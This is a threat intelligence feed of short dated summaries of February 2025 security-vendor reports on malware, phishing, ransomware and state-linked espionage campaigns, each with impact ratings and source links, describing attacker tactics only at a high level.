Threat Research Feed

2025-02-15
Winnti_Group_Targeting_Japanese_Organisations
MEDIUM
+
Intel Source:
LAC Watch
Intel Name:
Winnti_Group_Targeting_Japanese_Organisations
Date of Scan:
2025-02-15
Impact:
MEDIUM
Summary:
LAC Watch researchers have uncovered a new attack campaign dubbed RevivalStone conducted by Chinese threat actor Winnti group also known as APT41 targeting Japanese companies such as manufacturing, materials, and energy sectors. This campaign has been active since March 2024 in which attackers exploiting SQL Injection vulnerabilities in ERP systems to gain initial access. They install web shells like China Chopper, Behinder, and sqlmap file uploader which allow them to move through the network, steal credentials and gather intelligence. After getting the access, the attackers deploy advanced version of Winnti malware and use AES and Chacha20 encryption method to secure communications.
Source: https://www.lac.co.jp/lacwatch/report/20250213_004283.html
2025-02-15
Analyzing_DEEP_DRIVE
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
Analyzing_DEEP_DRIVE
Date of Scan:
2025-02-15
Impact:
MEDIUM
Summary:
Securonix researchers have identified an ongoing campaign called DEEP#DRIVE targeting South Korean businesses, government agencies and cryptocurrency users. The attackers use phishing emails embedded with malicious attachment disguise as legitimate documents such as work logs, insurance forms and crypto-related files to trick victims into opening them. Once user opens these files, a LNK file initiates a PowerShell script that install malware which gather system information and sends it back to the attackers through Dropbox. These files often in .hwp, .xlsx, .pptx formats that hosted on Dropbox. Researchers have attributed this campaign to Kimsuky, a North-Korean APT group based on their TTPs and the use of same Dropbox technique in prior campaigns.
Source: https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/
2025-02-15
JavaScript_to_C2_Server_Malware
LOW
+
Intel Source:
CYFIRMA
Intel Name:
JavaScript_to_C2_Server_Malware
Date of Scan:
2025-02-15
Impact:
LOW
Summary:
Cyfirma researchers have analyzed a sophisticated multi-stage malware attack using obfuscation, steganography, and covert communication to bypass detection. It begins with a disguised JavaScript file that executes a PowerShell script, which downloads a malicious JPG image and text file containing hidden executables. These payloads deploy Stealer malware to steal sensitive data, including credentials and browser information. The stolen data is sent to a Telegram bot, allowing attackers to maintain persistence while evading traditional security measures. The attack's use of legitimate services, encryption, and multi-layered obfuscation makes detection and mitigation difficult.
Source: https://www.cyfirma.com/research/javascript-to-command-and-control-c2-server-malware/
2025-02-14
Fake_Media_Targets_German_Elections
LOW
+
Intel Source:
Recorded Future
Intel Name:
Fake_Media_Targets_German_Elections
Date of Scan:
2025-02-14
Impact:
LOW
Summary:
Researchers from Insikt Group have discovered ongoing Russian influence activities aimed at the German federal elections on February 23, 2025. These operations, linked to networks like Doppelgänger, Operation Overload, CopyCop, and Operation Undercut, seek to raise sociopolitical issues, alter public discourse, and undermine trust in democratic institutions.
Source: https://www.recordedfuture.com/research/stimmen-aus-moskau-russian-influence-operations-target-german-elections
2025-02-14
Fake_Etsy_Invoice_Scam
LOW
+
Intel Source:
MalwareBytes
Intel Name:
Fake_Etsy_Invoice_Scam
Date of Scan:
2025-02-14
Impact:
LOW
Summary:
Malwarebytes researcher have identified a phishing campaign in which cybercriminals targeting Etsy sellers. The campaign starts with phishing emails that contains a PDF invoice hosted on a legitimate Etsy domain (etsystatic.com). The attached PDF contains a link that ask seller to confirm their identity or verify account. Once seller clicks on the link. It redirects the seller to fake Etsy login page to design to steal payment information which scammers can then use for fraudulent purchases or sell them on the dark web.
Source: https://www.malwarebytes.com/blog/news/2025/02/fake-etsy-invoice-scam-tricks-sellers-into-sharing-credit-card-information
2025-02-13
REF7707_Campaign_Targeting_South_America
MEDIUM
+
Intel Source:
Elastic
Intel Name:
REF7707_Campaign_Targeting_South_America
Date of Scan:
2025-02-13
Impact:
MEDIUM
Summary:
Researchers from Elastic Security Labs have discovered a cyber espionage campaign called REF7707 targeting the foreign ministry of a South American country. This campaign is linked to previous attacks in South Asian countries. The attackers of REF7707 campaign relies on advanced malwares such as FINALDRAFT, GUIDLOADER and PATHLOADER which are designed to infiltrate systems, execute malicious code and exfiltrate sensitive data. FINALDRAFT malware has both Window and Linux versions and is capable of stealing data and injecting itself into other programs. The main tactic is using in this campaign cloud services and third-party platforms for C2 communication.
Source: https://www.elastic.co/security-labs/fragile-web-ref7707
2025-02-13
The_BadPilot_Campaign
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
The_BadPilot_Campaign
Date of Scan:
2025-02-13
Impact:
MEDIUM
Summary:
Microsoft researchers have uncovered a subgroup within the Russian state actor called Seashell Blizzard conducting cyberattacks globally and compromising internet facing infrastructure to maintain long-term access to high-value targets. This group has been active since 2021 and is known for stealthy persistence, credential theft and lateral movement within compromised networks. It targets critical sectors such as energy, oil and gas, telecommunications, shipping, arms manufacturing, and government institutions. This group has leveraged published vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788) to gain initial access. It follows three primary tactics like Targeted Attacks – Using phishing, and backdoors, Opportunistic Attacks - exploiting vulnerabilities in internet-facing infrastructure to gain access and Hybrid Attacks – Using supply-chain compromises.
Source: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
2025-02-13
China_Espionage_Tools_Used_in_Ransomware_Attack
LOW
+
Intel Source:
Symantec
Intel Name:
China_Espionage_Tools_Used_in_Ransomware_Attack
Date of Scan:
2025-02-13
Impact:
LOW
Summary:
In late 2024, tools traditionally used by China-linked espionage groups were deployed in a ransomware attack against a South Asian software company. The attacker exploited a vulnerability in Palo Alto's PAN-OS firewall to gain access, steal cloud credentials, and encrypt the target's machines with RA World ransomware. Interestingly, the tools used were the same as those involved in previous espionage attacks, including the PlugX backdoor. This unusual blend of espionage tools with ransomware raises questions about whether China-linked actors are expanding into financially motivated attacks, a behavior typically seen in other nations like North Korea. The motives behind this shift remain unclear, but it suggests evolving tactics in cyber threats.
Source: https://www.security.com/threat-intelligence/chinese-espionage-ransomware
2025-02-12
Nigerian_Cybercriminals_Distributing_XLogger
LOW
+
Intel Source:
Cyberarmor
Intel Name:
Nigerian_Cybercriminals_Distributing_XLogger
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Researchers from Cyberarmor have uncovered a malware campaign conducted by Nigerian cybercriminals to collect email address for distributing malware. The attackers start with email harvesting where they gather a list of potential victims through social media, dark forums and Google Dorking techniques to find publicly available email addresses. They then launch phishing campaign from spoofed domains and use Gammadyne Mailer to send bulk emails while hiding their identity with remote access tools. Once a recipient opens the infected file, the XLogger malware silently steals their password and sensitive data from the system and then send all the stolen data to attacker’s telegram channel for further malicious activities.
Source: https://cyberarmor.tech/inside-a-malware-campaign-a-nigerian-hackers-perspective/
2025-02-12
StrelaStealer_Targeting_German_Speaking_Users
LOW
+
Intel Source:
Palo Alto
Intel Name:
StrelaStealer_Targeting_German_Speaking_Users
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Recent activity from StrelaStealer continues to utilize WebDAV servers, including the server at the IP address, to host malware. As of February 10, 2025, decoy PDF files are being used in the infection process, which is non-malicious but contains a blurred image to mislead victims. The malware is only triggered when the victim's Windows system has specific German language and locale settings (Austria, Germany, Liechtenstein, Luxembourg, Switzerland).
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-02-10-IOCs-for-StrelaStealer-activity.txt
2025-02-12
FCI_Job_Scam_Delivers_Xelera_Ransomware
LOW
+
Intel Source:
Seqrite
Intel Name:
FCI_Job_Scam_Delivers_Xelera_Ransomware
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Seqrite researchers have recently uncovered multiple campaigns involving fake job descriptions targeting individuals applying for technical positions at Food Corporations of India (FCI). This campaign distributes a variant of ransomware called Xelera, written in Python and packed using PyInstaller. On January 18, 2025, a malicious document named FCEI-job-notification.doc was found on VirusTotal, containing an embedded payload in OLE Streams. The payload, named jobnotification2025.exe, executes ransomware tasks and other malicious actions on the target machine via a Discord bot. PyInstaller continues to be a popular tool for deploying Python-based malware in the wild.
Source: https://www.seqrite.com/blog/xelera-ransomware-fake-fci-job-offers/
2025-02-12
USB_Malware_Mines_Monero_in_South_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
USB_Malware_Mines_Monero_in_South_Korea
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
ASEC researchers have discovered a case of cryptocurrency-mining malware spread via USB in South Korea. The malware, which mines Monero, uses PC resources without user consent. While mining itself isn't illegal, the unauthorized installation of mining software can be. The malware modifies system settings to optimize performance for mining, disables security measures like Windows Defender, and uses techniques like C&C communication through PostgreSQL and DLL sideloading to evade detection. The malware spreads rapidly via USB and generates significant profit, reportedly over 1 million won daily.
Source: https://asec.ahnlab.com/en/86221/
2025-02-12
NanoCore_RAT_Malware_Analysis
LOW
+
Intel Source:
malwr-analysis
Intel Name:
NanoCore_RAT_Malware_Analysis
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
NanoCore is a remote access trojan malware that helps cybercriminals for espionage, information stealing and take control of compromised systems. It is a customizable malware that allow attackers to add multiple features based on their requirements. This malware copies itself to a hidden folder and creates a registry entry to run automatically. It connects to remote C2 servers where attackers can send commands to control the compromised system. The malware records keystrokes, take screenshots and capture clipboard data and sending all this stolen information back to the attacker.
Source: https://malwr-analysis.com/2025/02/10/nanocore-rat-malware-analysis/
2025-02-11
UAC0006_Targeting_Ukraine_Largest_Bank
LOW
+
Intel Source:
Cloudsek
Intel Name:
UAC0006_Targeting_Ukraine_Largest_Bank
Date of Scan:
2025-02-11
Impact:
LOW
Summary:
CloudSek researchers have uncovered a phishing campaign conducted by a financially motivated threat group called UAC-0006 targeting Ukraine’s largest state-owned bank, Privat Bank. The attackers leverage phishing email containing password-protected ZIP or RAR files to trick victims into opening malicious files. These files run a malicious java script in the background which triggers hidden PowerShell command that downloads and installs the SmokeLoader malware. UAC-0006 effectively bypasses security detections and maintains long-term access to compromised systems by using JavaScript, VBScript and PowerShell.
Source: https://www.cloudsek.com/blog/getsmoked-uac-0006-returns-with-smokeloader-targeting-ukraines-largest-state-owned-bank
2025-02-10
Threat_Actors_Chained_Vulnerabilities_IvantiCSA
MEDIUM
+
Intel Source:
CISA
Intel Name:
Threat_Actors_Chained_Vulnerabilities_IvantiCSA
Date of Scan:
2025-02-10
Impact:
MEDIUM
Summary:
CISA and the FBI have issued a joint advisory regarding the exploitation of multiple vulnerabilities in Ivanti Cloud Service Appliances (CSA). Threat actors exploited CVE-2024-8963, CVE-2024-9379, CVE-2024-8190, and CVE-2024-9380 in September 2024 to gain initial access, execute remote code, steal credentials, and deploy webshells. These vulnerabilities were exploited in chained attacks targeting Ivanti CSA versions 4.6 (end-of-life) and certain 5.0.x versions. Exploits included administrative bypass, SQL injection, and command injection. Organizations using affected versions are urged to upgrade to the latest supported version and assume credentials stored on compromised appliances are exposed.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a
2025-02-10
Hunting_WebBased_Credit_Card_Skimmers
LOW
+
Intel Source:
gi7w0rm
Intel Name:
Hunting_WebBased_Credit_Card_Skimmers
Date of Scan:
2025-02-10
Impact:
LOW
Summary:
gi7w0rm explores techniques for detecting and analyzing web-based credit card skimmers—malicious scripts that target e-commerce websites to steal payment details during online transactions. The author explains how attackers exploit vulnerabilities or steal credentials to inject JavaScript that mimics legitimate payment forms, secretly capturing sensitive information. Tools like Urlscan.io, CyberChef, and Validin are highlighted for their effectiveness in identifying compromised websites and deobfuscating malicious code. A case study illustrates how a WordPress vulnerability was used to inject a skimmer that stole payment data by replacing authentic payment fields with fake ones.
Source: https://gi7w0rm.medium.com/a-beginner-s-guide-to-hunting-web-based-credit-card-skimmers-c820aeee87d6
2025-02-10
JMagic_Campaign
MEDIUM
+
Intel Source:
Black Lotus Labs
Intel Name:
JMagic_Campaign
Date of Scan:
2025-02-10
Impact:
MEDIUM
Summary:
Black Lotus Labs has uncovered a malware campaign, dubbed "J-magic," targeting Juniper enterprise-grade routers with a custom variant of the open-source backdoor tool, cd00r. This malware leverages "magic packets" to stealthily establish reverse shells on compromised devices, enabling attackers to exfiltrate data and maintain long-term access. Operating primarily in-memory, J-magic evades detection and takes advantage of routers' extended uptime and limited monitoring. The campaign, active from mid-2023 to at least mid-2024, has affected organizations across verticals like semiconductor, energy, and manufacturing, with a particular focus on routers serving as VPN gateways. While similarities exist with the SeaSpy malware, J-magic demonstrates advanced tradecraft with unique features such as an RSA challenge to secure remote access.
Source: https://blog.lumen.com/the-j-magic-show-magic-packets-and-where-to-find-them/
2025-02-09
NetSupport_RAT_Clickfix_Distribution
LOW
+
Intel Source:
ESentire
Intel Name:
NetSupport_RAT_Clickfix_Distribution
Date of Scan:
2025-02-09
Impact:
LOW
Summary:
Esentire researchers have observed an increase in attacks related to NetSupport RAT. The attackers are using ClickFix tactic to trick users into running malicious PowerShell command. This method involves fake CAPTCHA verification pages on compromised websites to instruct users to copy and execute specific commands that download and install the NetSupport RAT malware. This malware enables attackers to spy on victims in real time, take screenshots, record audio and video and transfer files.
Source: https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
2025-02-09
Polymorphic_Python_Script_Avoids_Detection
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Polymorphic_Python_Script_Avoids_Detection
Date of Scan:
2025-02-09
Impact:
LOW
Summary:
Researchers at ISC SANS have identified a malicious Python script that uses creative anti-debugging tactics to avoid inspection. The script employs multi-threading to conduct numerous evasion strategies concurrently, such as debugger detection, API hook analysis, memory integrity verification, and self-modifying code.
Source: https://isc.sans.edu/diary/rss/31658
2025-02-08
Mimic_Tax_Agencies_Targets_Financial_Entities
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
Mimic_Tax_Agencies_Targets_Financial_Entities
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Proofpoint researchers have uncovered a phishing campaign where threat actors targeting financial organizations and individuals worldwide to take advantage of the tax-filing period. They send phishing emails impersonating legitimate tax agencies such as HM Revenue & Customs (HMRC) in the UK, Intuit in the US and myGov in Australia. These emails use tax-related themes like overdue payments, tax refunds and account update trick people into opening them. These emails either lead them to fake websites to harvest their credentials or contain malicious attachments that installs malware like Rhadamanthys on their systems.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account?utm_source=social_organic&utm_social_network=twitter&utm_campaign=2025&utm_post_id=ea59ad2c-af76-4242-9e8d-3947e3db8856
2025-02-08
Fake_Cisco_Ad_Spreads_NetSupport_RAT
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Fake_Cisco_Ad_Spreads_NetSupport_RAT
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers at Malwarebytes have found a malicious campaign that used Google ads to spread a fake Cisco AnyConnect installer containing the NetSupport RAT. Threat actors copied a German university's website, not to deceive people directly, but to avoid ad detection systems. Users who searched for Cisco AnyConnect were routed to a fake Cisco copycat website that hosted the malware.
Source: https://www.malwarebytes.com/blog/news/2025/02/university-site-cloned-to-evade-ad-detection-distributes-fake-cisco-installer
2025-02-08
MacOS_Flexible_Ferret
MEDIUM
+
Intel Source:
SentinelLabs
Intel Name:
MacOS_Flexible_Ferret
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Researchers from Sentinel Labs have identified a new malware called FlexibleFerret targeting macOS users while evading Apple’s detection tool XProtect. This malware linked to North Korean cyber campaign called Contagious interview where attackers use deceptive tactics to lure job seekers into installing malicious software such as VCam or Camera Access. FlexibleFerret is delivered through a malicious Apple Installer package which contains critical components that work together to execute the malware which allow the attackers to steal information or gain control over the infected macOS systems.
Source: https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/
2025-02-08
10K_WordPressSites_Delivering_Malware
MEDIUM
+
Intel Source:
c/side
Intel Name:
10K_WordPressSites_Delivering_Malware
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Over 10,000 WordPress websites have been compromised to deliver malware targeting both macOS and Windows users. Attackers inject a malicious JavaScript file into outdated WordPress sites, generating fake Google browser update pages via an iframe. This campaign delivers AMOS (Atomic macOS Stealer) for Apple users and SocGholish for Windows users—malware previously thought to be distributed by separate groups. The infection spreads through vulnerable WordPress plugins, making detection difficult.
Source: https://cside.dev/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware
2025-02-08
XE_Group_Exploits_VeraCore_Flaws
LOW
+
Intel Source:
Intezer
Intel Name:
XE_Group_Exploits_VeraCore_Flaws
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers at Intezer have found that XE Group, a sophisticated cybercrime group operating since 2013, has shifted its techniques from credit card skimming to targeted information theft. Their most recent actions involve exploiting two zero-day vulnerabilities in VeraCore software (CVE-2024-57968, CVSS 9.9, and CVE-2025-25181, CVSS 5.8) to build webshells and keep persistent access to affected computers.
Source: https://intezer.com/blog/research/xe-group-exploiting-zero-days/
2025-02-08
APT_37_Targeting_K_Messenger
LOW
+
Intel Source:
Genians
Intel Name:
APT_37_Targeting_K_Messenger
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers from Genians have uncovered where APT 37 known as ScarCruft or Reaper targeting group chat platform called K messenger to spread malicious LNK files. These files are hidden inside ZIP archives and given deceptive names such as Changes in Chinese Government’s North Korea Policy.zip to trick victims into opening them. Once the victim clicks on the LNK file, it silently executes a hidden PowerShell command that triggers a series of infections. This eventually installs the RokRAT malware that can steal data, take screenshots and run commands on the compromised system.
Source: https://www.genians.co.kr/blog/threat_intelligence/k-messenger
2025-02-07
FLESH_STEALER
LOW
+
Intel Source:
Cyfirma
Intel Name:
FLESH_STEALER
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Cyfirma researchers have uncovered a Flesh Stealer which is designed to steal sensitive information from compromised system. It is developed by Russian-speaking individual and includes various features such as anti-debugging and anti-VM capabilities. This malware first appeared in August 2024 and has been promoted on multiple platforms like Discord, Telegram and underground forum like Pyrex Guru. Flesh Stealer primarily targets popular web browsers such as Chrome, Firefox, Opera, and Edge to steal stored credentials, cookies, and browsing history.
Source: https://www.cyfirma.com/research/flesh-stealer-unmasking-the-blue-masked-thief/
2025-02-07
Hugging_Face_Malware_Threat
LOW
+
Intel Source:
Reversing Labs
Intel Name:
Hugging_Face_Malware_Threat
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers at ReversingLabs have found a unique approach used by threat actors to transmit malware via the Hugging Face platform by exploiting Pickle file serialization. Pickle, a popular Python package for serializing ML model data, is sensitive since it permits arbitrary code execution during deserialization. Despite previous warnings and information highlighting these concerns, it is still popular due to its ease of use.
Source: https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face
2025-02-07
Attackers_Targeting_Govt_and_Education_Entities
LOW
+
Intel Source:
Hunt.IO
Intel Name:
Attackers_Targeting_Govt_and_Education_Entities
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers from Hunt.IO identified a threat group named GreenSpot that has been active since 2007. The group is believed to be operating from Taiwan and primarily targets government, academic and military-related organisations in China. They use phishing tactics where they create fake websites that resemble legitimate email services like Netease Mail to trick users into entering their credentials. When users enter their credential on these fake sites, attackers steal their login details and gains access to their accounts without permission.
Source: https://hunt.io/blog/greenspot-apt-targets-163com-fake-downloads-spoofing
2025-02-07
Stealthy_Malware_Bypasses_Chrome_Encryption
LOW
+
Intel Source:
Cyble
Intel Name:
Stealthy_Malware_Bypasses_Chrome_Encryption
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers from Cyble have found sneaky malware that can overcome Chrome's App-Bound Encryption via dual injection tactics. The malware is deployed as a ZIP archive containing an.An LNK file disguised as a PDF and an XML project file disguised as a PNG are aimed toward Vietnamese enterprises, notably those in the Telemarketing or Sales sectors.
Source: https://cyble.com/blog/dual-injection-undermines-chromes-encryption/
2025-02-07
StealingSeconds_WebsiteSkimmers
MEDIUM
+
Intel Source:
JScrambler
Intel Name:
StealingSeconds_WebsiteSkimmers
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
A recent investigation uncovered a web skimming attack affecting multiple websites, including Casio UK’s online store. The attack, exploiting vulnerabilities in Magento-based web stores, involved a two-stage skimmer that harvested sensitive customer data through an elaborate fake checkout process. Unlike typical skimmers that target only checkout pages, this one operated on all pages except the final checkout step, capturing personal and payment details before redirecting users to the legitimate page. The stolen data was encrypted and sent to a Russian-hosted server, suggesting an organized cybercriminal operation. Casio UK had a Content Security Policy (CSP) in place, but its ineffective configuration failed to prevent the attack.
Source: https://jscrambler.com/blog/stealing-seconds-web-skimmer-compromises-websites
2025-02-07
ClickFix_Tactics_in_DarkGate_Campaigns
LOW
+
Intel Source:
Malwarebytes
Intel Name:
ClickFix_Tactics_in_DarkGate_Campaigns
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered a new DarkGate malvertising operation that uses both the "ClickFix" approach and standard file downloads. ClickFix uses bogus CAPTCHA or traffic validation sites to entice visitors to paste and execute code, whereas previous techniques rely on malware-laden installers. This operation, which targets the Notion brand using malicious Google advertisements, indicates that threat actors are likely watching conversion metrics to see which strategy results in more effective malware infections.
Source: http://malwarebytes.com/blog/news/2025/01/clickfix-vs-traditional-download-in-new-darkgate-campaign
2025-02-07
KimsukyGroup_Using_RDP_Wrapper
MEDIUM
+
Intel Source:
ASEC
Intel Name:
KimsukyGroup_Using_RDP_Wrapper
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
The Kimsuky cyber threat group continues to conduct spear-phishing attacks, distributing malware disguised as document files to gain control of targeted systems. Their attacks leverage malicious shortcut files (*.LNK) that execute PowerShell commands to install malware such as the PebbleDash backdoor and a custom RDP Wrapper, which enables remote access. The group also employs proxy tools to bypass network restrictions, keyloggers to capture user inputs, and information-stealing malware that extracts credentials from web browsers. Recent attacks indicate a shift towards remote control tools rather than backdoors.
Source: https://asec.ahnlab.com/en/86098/
2025-02-07
Abyss_Locker_Ransomware
MEDIUM
+
Intel Source:
Sygnia
Intel Name:
Abyss_Locker_Ransomware
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
Sygnia researchers have identified a new ransomware group dubbed Abyss Locker that emerged in 2023 and continued its attack in 2024 leveraging ransomware to cripple victims. The group target critical infrastructure such as VPN appliances, network-attached storage (NAS) devices, and ESXi servers of an organisations to establish their footholds within the victim’s network. This group begins their attack by exploiting vulnerabilities in unpatched VPN appliances to gain initial access. They are exploiting a known vulnerability (CVE-2021-20038) in a SonicWall VPN device. After compromising the devices and network, they effectively deploy ransomware to encrypt the data.
Source: https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/
2025-02-06
ValleyRAT_Targets_Financial_Organizations
LOW
+
Intel Source:
Morphisec Labs
Intel Name:
ValleyRAT_Targets_Financial_Organizations
Date of Scan:
2025-02-06
Impact:
LOW
Summary:
Morphisec Labs researchers discovered a malware campaign using malware called ValleyRAT linked to Silver Fox APT Group. This campaign specifically targets finance and accounting departments of an organisations. The attackers employ phishing websites to distribute malware. One site is https[://]anizom[.]com/ to lure users into downloading a fake chrome browser while another impersonates Chinese telecom company called Karlos and delivers malicious files. When users extract and run these files, it requests for privilege access to gain administrative system access.
Source: https://www.morphisec.com/blog/rat-race-valleyrat-malware-china/?utm_content=323764605&utm_medium=social&utm_source=twitter&hss_channel=tw-2965779277
2025-02-06
ReverseEngineering_of_ELF_SshdinjectorAtr
MEDIUM
+
Intel Source:
Fortiguard Labs
Intel Name:
ReverseEngineering_of_ELF_SshdinjectorAtr
Date of Scan:
2025-02-06
Impact:
MEDIUM
Summary:
FortiGuard Labs analyzed ELF/Sshdinjector.A!tr, a Linux-based malware targeting network appliances and IoT devices for data exfiltration. Linked to the DaggerFly espionage group and the Lunar Peek campaign, the malware injects itself into the SSH daemon, maintaining persistence through infected binaries and communicating with a remote command-and-control (C2) server. Researchers reverse-engineered its components using Radare2 and AI-assisted analysis via r2ai. While AI provided efficient summaries and readable source code, it also introduced errors such as hallucinations, exaggerations, and omissions, underscoring the need for human oversight.
Source: https://www.fortinet.com/blog/threat-research/analyzing-elf-sshdinjector-with-a-human-and-artificial-analyst
2025-02-06
NetflixThemed_Survey_Phishing_Campaign
MEDIUM
+
Intel Source:
Unit 42
Intel Name:
NetflixThemed_Survey_Phishing_Campaign
Date of Scan:
2025-02-06
Impact:
MEDIUM
Summary:
Unit 42 identified a recent phishing campaign is exploiting fake Netflix-themed surveys to steal credit card information. The scam lures users into completing a survey, which then redirects them to a fraudulent payment page requesting credit card details. If users provide their information, they are sent to a fake "winner" page, while those who ignore the survey are redirected to another scam site after two minutes. The domain has shown increased activity in December 2024 and January 2025, likely tied to this phishing operation.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-02-03-IOCs-for-Netflix-themed-survey-phishing-campaign.txt
2025-02-04
AsyncRAT_Abusing_Python_and_TryCloudflare
LOW
+
Intel Source:
ForcePoint
Intel Name:
AsyncRAT_Abusing_Python_and_TryCloudflare
Date of Scan:
2025-02-04
Impact:
LOW
Summary:
Forcepoint Labs have uncovered a new AsyncRAT malware campaign abusing TryCloudflare and malicious Python Packages. The attacker leverage phishing emails which contain a Dropbox link that downloads a ZIP file with .URL extension. This .url file extension redirect to an .lnk file which then executes JavaScript that downloads AsyncRAT malware, giving attackers full control over the compromised system.
Source: https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware
2025-02-03
Operation_Phantom_Circuit
MEDIUM
+
Intel Source:
SecurityScorecard
Intel Name:
Operation_Phantom_Circuit
Date of Scan:
2025-02-03
Impact:
MEDIUM
Summary:
In December 2024, the North Korea-linked Lazarus Group launched "Operation Phantom Circuit," a sophisticated cyberattack targeting cryptocurrency and technology developers worldwide. By embedding malware into trusted development tools, the group compromised over 1,500 systems across multiple attack waves. STRIKE’s investigation revealed an elaborate infrastructure involving proxy servers in Hasan, Russia, command-and-control servers, and persistent remote access sessions to exfiltrate sensitive data. Attackers employed VPNs and commercial proxy networks to obfuscate their origins, routing traffic through Russian-based Oculus Proxy nodes before reaching their command centers. The stolen data—including credentials, authentication tokens, and system configurations—was ultimately stored on Dropbox.
Source: https://securityscorecard.com/blog/operation-phantom-circuit-north-koreas-global-data-exfiltration-campaign/
2025-02-03
High_Profile_Account_Targeting_on_Twitter
LOW
+
Intel Source:
SentinelOne
Intel Name:
High_Profile_Account_Targeting_on_Twitter
Date of Scan:
2025-02-03
Impact:
LOW
Summary:
Researcher from Sentinel labs have uncovered a phishing campaign targeting Twitter account holders to hijack them for fraudulent activities. The attackers are targeting U.S. political figures, International journalists, X employees, cryptocurrency organizations and other platforms to steal money from unsuspecting victims. Their main focus is on high-profile accounts on twitter. In this campaign, they use two different tactics to deceive users. The first is fake account logins via emails and second is copyright violation warnings to trick users into clicking malicious links. Once they take over the account, they immediately lock the account and start posting fraudulent cryptocurrency investment opportunities for financial gains.
Source: https://www.sentinelone.com/labs/phishing-on-x-high-profile-account-targeting-campaign-returns/
2025-02-02
New_Aquabotv3_Malware_Targets_Mitel_SIP_Phones
LOW
+
Intel Source:
Akamai
Intel Name:
New_Aquabotv3_Malware_Targets_Mitel_SIP_Phones
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Akamai researchers have discovered a new variant of the Mirai-based malware Aquabotv3. This variant targets Mitel SIP phones by exploiting CVE-2024-41710, a command injection vulnerability. This new version introduces a unique function, report_kill, which notifies the command and control (C2) server when a kill signal is detected on the infected device. As of the latest update, no response has been observed from C2.
Source: https://www.akamai.com/blog/security-research/2025-january-new-aquabot-mirai-variant-exploiting-mitel-phones
2025-02-02
CL_STA_0048_Targeting_South_Asia
LOW
+
Intel Source:
Palo Alto
Intel Name:
CL_STA_0048_Targeting_South_Asia
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at Palo Alto Networks have discovered an espionage effort known as CL-STA-0048 that targeted high-value entities in South Asia, including a telecommunications corporation. The attackers used uncommon approaches such as Hex Staging for payload delivery, DNS exfiltration via ping, and SQLcmd misuse for data theft. Based on the methods, tools, infrastructure, and victimology, the activity is believed to originate in China with moderate-high confidence.
Source: https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/
2025-02-02
Lumma_Stealer_GitHub_Based_Delivery
LOW
+
Intel Source:
Trend Micro
Intel Name:
Lumma_Stealer_GitHub_Based_Delivery
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Trend Micro researchers have discovered a sophisticated campaign distributing Lumma Stealer malware via GitHub's release infrastructure. The attackers exploited GitHub as a trusted platform to deliver the malware, which then deployed additional threats like SectopRAT, Vidar, Cobeacon, and another Lumma Stealer variant. The campaign shows ties to the Stargazer Goblin group, known for using compromised websites and GitHub repositories to distribute malicious payloads, highlighting the group's evolving tactics.
Source: https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html
2025-02-02
Malicious_Domains_Impersonate_Tax_Agencies
LOW
+
Intel Source:
Proofpoint
Intel Name:
Malicious_Domains_Impersonate_Tax_Agencies
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at Proofpoint have detected a rise in scams and malicious websites mimicking tax agencies and financial companies, coinciding with tax season in the United Kingdom and the United States. Attackers have used tax-related topics to spoof government agencies and financial institutions, attempting to trick users into engaging with fake information.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account
2025-02-02
Windows_Locker_Ransomware_Insight
LOW
+
Intel Source:
Cyfirma
Intel Name:
Windows_Locker_Ransomware_Insight
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at CYFIRMA have discovered a new ransomware called "Windows Locker," which targets victims by encrypting their files and appending the.winlocker extension. When infected, it leaves a ransom note called Readme.txt, which instructs you to contact the attacker or an authorized administrator for payment and decryption. This malware, written in.NET, originally appeared in December 2024 and has since been widely distributed via GitHub.
